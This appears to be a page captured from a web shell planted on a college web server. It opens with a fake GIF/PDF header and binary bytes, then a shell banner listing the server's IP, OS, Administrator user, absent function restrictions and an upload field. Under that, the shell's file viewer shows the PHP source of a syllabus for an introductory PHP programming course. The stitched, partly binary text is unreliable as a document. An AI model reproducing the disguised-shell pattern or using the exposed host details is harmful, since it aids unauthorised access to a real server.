GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1146/Syllabus/ |
Upload File : |
<? // JimMartinson/CST1146/Syllabus/CST1146_Syllabus.phpinc ?> <fieldset><legend>Description</legend> In this course students will design and write programs using PHP, a widely used programming language used to make dynamic web sites and web applications. Students will write PHP programs to solve real world problems. PHP code will be written using a code editor (Brackets). Students will be running their projects on an actual web server with PHP and MySQL installed. This course is based on the use of web resource study, lecture content, and hands-on structured labs assigned by the instructor. <!--The course can optionally be presented in a personalized manner with the permission and guidance of the Instructor. --> <br> (Prerequisites: CST1021) (<?=$class['credits']?> Credits) (<?=$class['credits']?> Lecture, 0 Lab, 0 On the Job Training.) </fieldset> <fieldset><legend>Objectives</legend> <ol class="obj"> <li>Evaluate and choose a domain name. (Optional)</li> <li>Register a domain name. (Optional)</li> <li>Evaluate web hosting companies and choose a hosting package. (Optional)</li> <li>Navigate through the directory structures of a remote host and the local machine.</li> <li>Publish web content to a host.</li> <li>Review HTML concepts.</li> <li>Distinguish between service side and client side scripting.</li> <li>Distinguish between the various server side languages.</li> <li>Create a PHP script within an HTML page.</li> <li>Create PHP decision and loop structures.</li> <li>Create a mail sending application using PHP.</li> <li>Create page includes using PHP.</li> <li>Create a MySQL database and its associated tables.</li> <li>Create a working customer contact list using MySQL and PHP.</li> <li>Evaluate different security measures regarding dynamic web sites.</li> <li>Retrieve data from other sources, reformat the data, and display on web site.</li> <li>Create dynamic graphical elements for page display.</li> <li>Create an object oriented PHP program.</li> <li>Modify existing public domain scripts.</li> </ol> </fieldset> <fieldset><legend>Requirements</legend> An average student will spend <?=$class['totalHours']?> hours performing course tasks: <? if ($class['lectureHours'] != 0) { ?><?=$class['lectureHours']?> hours of lecture<?=$lectureHoursPunctuation?><? } ?> <? if ($class['labHours'] != 0) { ?><?=$class['labHours']?> hours working on assigned tasks in the lab<?=$labHoursPunctuation?><? } ?> <? if ($class['lectureHours'] == 0 && $class['labHours'] == 0) { ?>No class hours, <? } ?> <? if ($class['outsideHours'] != 0) { ?><?=$class['outsideHours']?> hours out-of-class<? } ?> . Factual information is provided through informal presentation or in a personalized format. The student is expected to contact the instructor if difficulty is encountered or help is needed. <? if ($class['lectureHours'] != 0 || $class['labHours'] != 0) { ?> Attendance is critical for completion of the lab credits.<? } ?> </fieldset> <fieldset><legend>Grading</legend> Student assignments are translated to a percentage and the percentages to grades. A score of 70% is passing. The following percentage distribution guarantees the following grade: A:93%+, A-:90%+, B+:87%+, B:83%+, B-:80%+, C+:77%+, C:73%+, C-:70%+, F:<70%. </fieldset> <? include('Course/DisabilityNotice.phpinc'); ?>